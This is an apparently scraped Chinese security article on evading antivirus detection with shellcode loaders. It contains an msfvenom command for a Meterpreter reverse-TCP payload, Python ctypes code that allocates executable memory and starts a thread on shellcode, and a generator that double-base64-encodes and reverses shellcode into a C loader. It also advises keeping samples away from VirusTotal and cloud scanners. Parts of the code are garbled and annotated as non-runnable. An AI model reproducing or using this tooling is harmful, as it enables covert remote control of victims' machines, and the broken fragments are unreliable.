2020-12-20 11:02:35 Author: mp.weixin.qq.com




import ctypes

# Sketch of the usual "allocate RWX, copy bytes, run them" sequence; only the first two
# steps appear in this fragment. VirtualAlloc(lpAddress=0, dwSize=len(shellcode),
# flAllocationType=0x3000 (MEM_COMMIT|MEM_RESERVE), flProtect=0x40 (PAGE_EXECUTE_READWRITE)).
# Detection note: a fresh private RWX region that is written to right after allocation is a
# well-known injection indicator, independent of which bytes are copied into it.
shellcode = """"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
# NOTE(review): from_buffer() is called on a str here; ctypes rejects that with TypeError,
# so this fragment does not run as pasted.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# RtlMoveMemory(Destination=ptr, Source=buf, Length=len(shellcode)): copies the buffer into the RWX page.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))








VirtualAlloc、RtlMoveMemory、CreateThread、WaitForSingleObject 这四个方法,我们直接使用即可。









个人经验告诉你,使用Python Ruby这种解释型语言,打包成EXE就算是正常程序也很有可能被拦截,而像C和GO以及C ++这种编译型语言则不会有这种问题。免杀,放在虚拟机,并且断网防止被上传,自己弄了老半天的东西免杀变成,却坚持不了多久。还有也不要上传VT等杀毒网站,会被厂商拿去分析的免杀的时候也不要上传到反对360的云查杀。下面我来叙述一下我的思路。


ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes .c_int(len(shellcode))),


import ctypes

# Second fragment of the same sketch. It is not runnable as pasted: `a` is assigned but the
# next two lines read an undefined `shellcode` (NameError), and from_buffer() again receives a str.
a = "shellcode"
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# `shell` is the hex encoding of the RtlMoveMemory line quoted just above this fragment;
# the call itself is absent from the code, and nothing on this page decodes or uses `shell`.
shell = "6374797065732e77696e646c6c2e6b65726e656c33322e52746c4d6f76654d656d6f7279286374797065732e635f696e7428707472292c206275662c206374797065732e635f696e74286c656e287368656c6c636f6465292929"
# CreateThread(lpThreadAttributes=0, dwStackSize=0, lpStartAddress=ptr, lpParameter=0,
# dwCreationFlags=0, lpThreadId=&dummy). Detection note: a thread whose start address lies in
# a VirtualAlloc'd page rather than a loaded module image is the other standard injection indicator.
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))





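/* ASCII byte -> 6-bit base64 value (Apache ap_base64.c layout).
 * Entries of 64 mark bytes outside the base64 alphabet; the decoders below
 * use "<= 63" as their loop guard, so the first non-alphabet byte (including
 * the NUL terminator) ends the scan. The braces that close the initializer
 * were lost in the page's copy and are restored here. */
static const unsigned char pr2six[256] =
{
    /* ASCII table */
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
    64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};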
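/* Return the buffer size needed to decode bufcoded: decoded bytes plus one
 * for the NUL terminator that Base64decode appends. The input is scanned up
 * to the first byte outside the base64 alphabet, which is also how the end
 * of the string is detected. Braces lost in the page's copy are restored. */
int Base64decode_len(const char* bufcoded)
{
    int nbytesdecoded;
    register const unsigned char* bufin;
    register int nprbytes;

    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);   /* stops on the first non-alphabet byte */
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    return nbytesdecoded + 1;
}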
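/* Decode the base64 text at bufcoded into bufplain and NUL-terminate it.
 * Returns the number of decoded bytes (terminator not counted).
 *
 * bufplain must hold at least Base64decode_len(bufcoded) bytes: nothing here
 * bounds the writes, so a caller that passes a smaller fixed-size buffer
 * (the loader template further down this page decodes into 1024-byte stack
 * arrays) overruns it as soon as the decoded data outgrows the buffer.
 * '=' padding is not required; decoding stops at the first non-alphabet
 * byte. Braces lost in the page's copy are restored. */
int Base64decode(char* bufplain, const char* bufcoded)
{
    int nbytesdecoded;
    register const unsigned char* bufin;
    register unsigned char* bufout;
    register int nprbytes;

    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;

    bufout = (unsigned char*)bufplain;
    bufin = (const unsigned char*)bufcoded;

    /* Whole 4-char groups; the last 1..4 chars are handled by the tail below. */
    while (nprbytes > 4) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
        bufin += 4;
        nprbytes -= 4;
    }

    /* Note: (nprbytes == 1) would be an error, so just ignore that case */
    if (nprbytes > 1) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
    }
    if (nprbytes > 2) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
    }
    if (nprbytes > 3) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
    }

    *(bufout++) = '\0';
    /* A partial final group yields fewer than 3 bytes; correct the estimate. */
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
}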
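/* Standard base64 alphabet (RFC 4648 table 1); index 0..63 -> output char.
 * The literal was stripped from the page's copy and is restored here. */
static const char basis_64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";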
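/* Return the buffer size needed by Base64encode for len input bytes:
 * 4 output chars per started group of 3, plus the NUL terminator. */
int Base64encode_len(int len)
{
    return ((len + 2) / 3 * 4) + 1;
}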
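/* Base64-encode len bytes of string into encoded and NUL-terminate it.
 * Returns the number of bytes written including the terminator, so encoded
 * must hold Base64encode_len(len) bytes. This variant deliberately omits the
 * '=' padding (see the commented-out lines), which Base64decode above accepts
 * because it stops at the first non-alphabet byte.
 * The page's copy lost the "[i]" subscripts (rendered as bare "string") and
 * the closing braces; both are restored here. */
int Base64encode(char* encoded, const char* string, int len)
{
    int i;
    char* p;

    p = encoded;
    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[(string[i] >> 2) & 0x3F];
        *p++ = basis_64[((string[i] & 0x3) << 4) |
            ((int)(string[i + 1] & 0xF0) >> 4)];
        *p++ = basis_64[((string[i + 1] & 0xF) << 2) |
            ((int)(string[i + 2] & 0xC0) >> 6)];
        *p++ = basis_64[string[i + 2] & 0x3F];
    }
    if (i < len) {
        /* 1 or 2 trailing bytes: emit 2 or 3 chars, no padding. */
        *p++ = basis_64[(string[i] >> 2) & 0x3F];
        if (i == (len - 1)) {
            *p++ = basis_64[((string[i] & 0x3) << 4)];
            // *p++ = '=';
        }
        else {
            *p++ = basis_64[((string[i] & 0x3) << 4) |
                ((int)(string[i + 1] & 0xF0) >> 4)];
            *p++ = basis_64[((string[i + 1] & 0xF) << 2)];
        }
        //*p++ = '=';
    }

    *p++ = '\0';
    return p - encoded;
}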

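/* Reverse the NUL-terminated byte string p in place. A NULL p is a no-op.
 * The page's copy had no return type (implicit int is invalid since C99),
 * passed an unsigned char* to strlen without a cast, declared an unused
 * int i that the loop's size_t i shadowed, and lost its closing braces. */
void string_change(unsigned char* p)
{
    size_t len;
    size_t i;
    unsigned char temp;

    if (p == NULL)
        return;
    len = strlen((const char*)p);
    /* Swap symmetric pairs; the middle byte of an odd-length string stays put. */
    for (i = 0; i < (len / 2); i++) {
        temp = p[i];
        p[i] = p[len - 1 - i];
        p[len - 1 - i] = temp;
    }
}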


msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost= lport=4444 -f c -o shell.c


import base64,sys

# C source template for the file written by main() below; the `%s` in `init_buf`
# is replaced with the reversed, double-base64 text that main() builds.
# NOTE(review): in this copy of the page the literal's closing """ was lost, as were
# most of the C braces and the `[i]` subscripts inside it (rendered as a bare `string`
# followed by a line break), so neither this script nor the emitted C parses as pasted.
# NOTE(review): the template decodes into two fixed 1024-byte stack arrays
# (kekeoyyds_bufs / kekeoyyds_buf) with Base64decode, which writes Base64decode_len()
# bytes and never checks the destination size - a decoded payload larger than 1024
# bytes overruns those arrays; memcpy then copies the whole 1024 bytes regardless.
text = """#include <string.h>
#pragma comment(linker,"/subsystem:\\"Windows\\" /entry:\\"mainCRTStartup\\"")
static const unsigned char pr2six[256] =
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
    64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
int Base64decode_len(const char* bufcoded)
    int nbytesdecoded;
    register const unsigned char* bufin;
    register int nprbytes;
    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    return nbytesdecoded + 1;
int Base64decode(char* bufplain, const char* bufcoded)
    int nbytesdecoded;
    register const unsigned char* bufin;
    register unsigned char* bufout;
    register int nprbytes;
    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63);
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    bufout = (unsigned char*)bufplain;
    bufin = (const unsigned char*)bufcoded;
    while (nprbytes > 4) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
        bufin += 4;
        nprbytes -= 4;
    /* Note: (nprbytes == 1) would be an error, so just ingore that case */
    if (nprbytes > 1) {
        *(bufout++) =
            (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
    if (nprbytes > 2) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
    if (nprbytes > 3) {
        *(bufout++) =
            (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
    *(bufout++) = '\\0';
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
static const char basis_64[] =
int Base64encode_len(int len)
    return ((len + 2) / 3 * 4) + 1;
int Base64encode(char* encoded, const char* string, int len)
    int i;
    char* p;
    p = encoded;
    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[(string
 >> 2) & 0x3F];
        *p++ = basis_64[((string
 & 0x3) << 4) |
            ((int)(string[i + 1] & 0xF0) >> 4)];
        *p++ = basis_64[((string[i + 1] & 0xF) << 2) |
            ((int)(string[i + 2] & 0xC0) >> 6)];
        *p++ = basis_64[string[i + 2] & 0x3F];
    if (i < len) {
        *p++ = basis_64[(string
 >> 2) & 0x3F];
        if (i == (len - 1)) {
            *p++ = basis_64[((string
 & 0x3) << 4)];
            // *p++ = '=';
        else {
            *p++ = basis_64[((string
 & 0x3) << 4) |
                ((int)(string[i + 1] & 0xF0) >> 4)];
            *p++ = basis_64[((string[i + 1] & 0xF) << 2)];
        //*p++ = '=';
    *p++ = '\\0';
    return p - encoded;

string_change(unsigned char* p) {
    int i, len;
    char temp;
    len = strlen(p);
    for (size_t i = 0; i < (len / 2); i++)
        temp = p[i];
        p[i] = p[len - 1 - i];
        p[len - 1 - i] = temp;
    unsigned char init_buf[] = "%s";
    char kekeoyyds_bufs[1024] = { 0 };
    char kekeoyyds_buf[1024] = { 0 };
    Base64decode(kekeoyyds_bufs, init_buf);
    Base64decode(kekeoyyds_buf, kekeoyyds_bufs);
    char* dmagic_memory;
    dmagic_memory = VirtualAlloc(NULL, sizeof(kekeoyyds_buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(dmagic_memory, kekeoyyds_buf, sizeof(kekeoyyds_buf));

if __name__ == '__main__':
    # Usage: python base.py shell.c shellcode.c
    # argv[1] is a C-array dump (msfvenom `-f c` style); argv[2] is the C file to write.
    if len(sys.argv) == 3:
        print("开始处理:%s" % sys.argv[1])
        with open(sys.argv[1]) as file:
            shellcode = ""
            # Keep every line except the `unsigned char ...` declaration, dropping the
            # line ending, the trailing ';' and the surrounding quotes, which leaves the
            # "\x.." escape text of each line.
            for i in file.readlines():
                if "unsigned" not in i:
                    shellcode += i.strip("\n").strip("\r").strip(";").strip("\"")
            # NOTE(review): exec() on text read from the input file runs whatever that file
            # contains as Python; the conversion of the escape text into bytes happens only
            # as a side effect of that. The input is trusted purely by convention here.
            exec('shellcode = b"%s"' % shellcode)
            # Two base64 layers, then the text is reversed, before substitution into `text`.
            shellcode = base64.b64encode(shellcode)
            shellcode = base64.b64encode(shellcode)
            shellcode = shellcode.decode("utf8")[::-1]
            # NOTE(review): `"w+"as` is garbled in this copy (the `)` and a space are
            # missing), so the script does not parse as pasted.
            with open("./"+sys.argv[2],"w+"as shellcodefile:
                shellcodefile.write(text % shellcode)
                print("处理完毕:%s" % sys.argv[2])
        # NOTE(review): this usage line sits inside the argc == 3 branch, so it prints
        # after a successful run and never for a wrong argument count; an `else:` was
        # presumably lost in extraction.
        print("python base.py shell.c shellcode.c")


#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")












文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650496935&idx=3&sn=f0261a5dd04783faf8d10fa98f7a5e0b&chksm=83ba3a43b4cdb3558aa7369928c5db3f683d3022f350d2d3f6745c2c93c7e5a6f8ffe31991c6#rd